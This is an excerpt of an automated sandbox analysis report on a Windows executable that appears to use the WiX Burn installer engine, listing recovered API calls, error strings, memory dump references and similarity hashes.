                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00946760, 009467BA
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, name: %ls, xrefs: 009467AE
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, xrefs: 00946754
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3938230626
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,008E7659,?,?,00000001,00000000,00000000), ref: 00903844
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,008E7659,?,?,00000001,00000000,00000000), ref: 0090384A
                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID: CreateProcessW failed with return code: %d$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2919029540-2527134587
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0090EB41: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0090E01F,?,?,?), ref: 0090EB69
                                                                                                                                                                                                                                                                              • Part of subcall function 0090EB41: GetLastError.KERNEL32(?,0090E01F,?,?,?), ref: 0090EB73
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 0090E02D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0090E037
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                                                                                                                            • String ID: Failed to read during cabinet extraction.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2170121939-336985225
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,00000000,00000000,008FCE5F,00000000,00000000,00000000,?,?,?,00942BE6,?,?,?), ref: 00943F95
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00942BE6,?,?,?), ref: 00943F9F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                            • String ID: Failed to write data to file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 442123175-1082378667
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439F5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                            • String ID: Failed to set file pointer.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976181284-4026511950
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0090E01F,?,?,?), ref: 0090EB69
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090E01F,?,?,?), ref: 0090EB73
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                            • String ID: Failed to move to virtual file pointer.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2976181284-2079782632
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,00000000,00000002,00000002,?,008FA612,00000008,?), ref: 008FA072
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Logging, xrefs: 008F9FFF
                                                                                                                                                                                                                                                                            • SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 008F9FE8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-387823766
                                                                                                                                                                                                                                                                            • Opcode ID: f32209167ad21df0829b0f695aa152c4534c6b49c781324a64141164d14192a9
                                                                                                                                                                                                                                                                            • Instruction ID: 3811ee6591e494f0d1016e1723b708107f061b1ad24d5038f8f9db26070837ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f32209167ad21df0829b0f695aa152c4534c6b49c781324a64141164d14192a9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E1126B6540A0DEBEB38DA30E906FBA7768FB85B25F900054EE09E7180DA759E41C752
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093CC1C, 0093CC22, 0093CC39
                                                                                                                                                                                                                                                                            • Failed to open registry key, root: %x, subkey: %ls., xrefs: 0093CC2E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                            • String ID: Failed to open registry key, root: %x, subkey: %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 71445658-2584571730
                                                                                                                                                                                                                                                                            • Opcode ID: 67fa8913ef28b86db4d45610161c9909cea39be8de59b356cf0923c9be4ddffb
                                                                                                                                                                                                                                                                            • Instruction ID: f384915dce032a8dc81de022a0edaf00f7a565cb2eacf174e1184b5acfdce396
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67fa8913ef28b86db4d45610161c9909cea39be8de59b356cf0923c9be4ddffb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 540126B710095876EB211A178C09E9B3A5EEBC5360F054820FA1CAB250D6318C51DBB4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize Cryputil., xrefs: 008E7BE6
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize Cryputil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-397782128
                                                                                                                                                                                                                                                                            • Opcode ID: 8937a9508f248c67a4b99f1c359a59461db5107f724a26f39f80031398011154
                                                                                                                                                                                                                                                                            • Instruction ID: 43658158c3de9c33007f71123789817e9cd300cd71778d4686de3878dc6f8e78
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8937a9508f248c67a4b99f1c359a59461db5107f724a26f39f80031398011154
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA4161719056A9D6DF34B7A5CC06BAD72B8FF42305F1840A6A558E2182DF748EC8CF92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize engine state., xrefs: 008E7B61
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize engine state.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-3105230827
                                                                                                                                                                                                                                                                            • Opcode ID: 9c51e8ff955aa5931fd937d5eaf475b42006c2ab92e2eaf3fbc254fac760ac34
                                                                                                                                                                                                                                                                            • Instruction ID: cdd56e3715cfc043c1afcceb71d54b0ca5f20ca38399fce633cb805643440d8c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c51e8ff955aa5931fd937d5eaf475b42006c2ab92e2eaf3fbc254fac760ac34
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 754162719056A9D6DF34B7A5CC06BAD72B8FF42305F1840A5A558E2182DF748EC8CF92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to initialize Regutil., xrefs: 008E7C13
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to initialize Regutil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-4164290783
                                                                                                                                                                                                                                                                            • Opcode ID: f699e4061cdb9b73391d62aecdfd5d01716e5aeadd4c127d82c559054db8d8dc
                                                                                                                                                                                                                                                                            • Instruction ID: 0efdf077ca90321ae215a780d7315187c10758ba5f00cb3c520aeb32862abb2b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f699e4061cdb9b73391d62aecdfd5d01716e5aeadd4c127d82c559054db8d8dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF4171319056A9D6DF34B7A5CC06BAD72B8FF42305F1840A6A558E2082DF748EC8CF92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7B31
                                                                                                                                                                                                                                                                            • Failed to parse command line., xrefs: 008E7B1F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to parse command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-3869882359
                                                                                                                                                                                                                                                                            • Opcode ID: 52eb869c0bfb55e67a92fcdc4af5c522028ee9fc091bedfdea3f03fdd14d9219
                                                                                                                                                                                                                                                                            • Instruction ID: 13e78a2d578ee1b16b52ad07e7654cd81d5c80df62a0cd27ac5adb187d42dee6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52eb869c0bfb55e67a92fcdc4af5c522028ee9fc091bedfdea3f03fdd14d9219
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C94171309056A9D6DF34B7A5CC06BAD72B8FF42305F0840A5A548E20C2DF748EC8CF92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,0090DE2B,?), ref: 008E55D3
                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,0090DE2B,?), ref: 008E55DA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0090DE2B,?), ref: 008E55E4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 406640338-0
                                                                                                                                                                                                                                                                            • Opcode ID: fac45c8e5f506ba0d472553b5e93aa4f287ee1940707de9553de2b59dc409056
                                                                                                                                                                                                                                                                            • Instruction ID: 14fc04f79974d76640d7fa528cbfff2ef35e2eab6ac3303f2866f576d01dd216
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fac45c8e5f506ba0d472553b5e93aa4f287ee1940707de9553de2b59dc409056
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD0C277909935A3C22017EAAC08D4BBE6DFF026A17014621FD04D7110C661CC00A2E0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0092E74E,?,0092E63E,00000000,?,?,0092E74E,D7B140E6,?,0092E74E), ref: 0092E655
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0092E63E,00000000,?,?,0092E74E,D7B140E6,?,0092E74E), ref: 0092E65C
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0092E66E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7f805f2ab5e122cd8f06b4f98b5a4801a22c2fe78a10ad07da87df707b9027f8
                                                                                                                                                                                                                                                                            • Instruction ID: d6f4ef05855355300014dcb7e988110c4505c95f1bff1bfdc9d831d723af9ea2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f805f2ab5e122cd8f06b4f98b5a4801a22c2fe78a10ad07da87df707b9027f8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6D09235018118BFDF052FA0EC4DE993F2AFF96345B408150B9194A175DF759D92EB84
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E80F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to run per-user mode., xrefs: 008E7E78
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to run per-user mode.
                                                                                                                                                                                                                                                                            • API String ID: 3861434553-1208236218
                                                                                                                                                                                                                                                                            • Opcode ID: 267b12a476aebf612a467094bff13b0e92f1ee69d43c20fd5005ce12e9707ee0
                                                                                                                                                                                                                                                                            • Instruction ID: 64fdfd4660b040cacf9d4cb5f666b06d4e00a360b71fae1d45b1371dd88e9469
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 267b12a476aebf612a467094bff13b0e92f1ee69d43c20fd5005ce12e9707ee0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E44180719056A9D6DB34ABA5CC06BAD73B8FF01305F1840A6A548E2182DF749E84CF92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(FFFFFFFF,?,0093B428,00000000,00000000,?,008E8106), ref: 0093AC55
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-727612987
APIs
• CloseHandle.KERNELBASE(000000FF,?,?), ref: 0090DE0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: CloseHandle
• String ID: .Wu@1Wu
• API String ID: 2962429428-727612987
APIs
• EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,?,0093A9A3,?,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 0093B3FD
• LeaveCriticalSection.KERNEL32(0097D4F0,?,?,0093A9A3,?,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 0093B40E
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
APIs
• RegQueryValueExW.KERNELBASE(?,?,0093D0F5,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0093CDF4,00000000), ref: 0093C2F7
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
APIs
  • Part of subcall function 0093AC32: CloseHandle.KERNELBASE(FFFFFFFF,?,0093B428,00000000,00000000,?,008E8106), ref: 0093AC55
• DeleteCriticalSection.KERNEL32(0097D4F0,00000000,00000000,?,008E8106,00000000,?,?,?,?), ref: 0093B437
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: CloseCriticalDeleteHandleSection
• String ID:
• API String ID: 1370521891-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C4F6: RtlAcquireSRWLockExclusive.NTDLL ref: 0094C513
                                                                                                                                                                                                                                                                            • DloadProtectSection.DELAYIMP ref: 0094C475
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3680172570-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C183
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C183
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
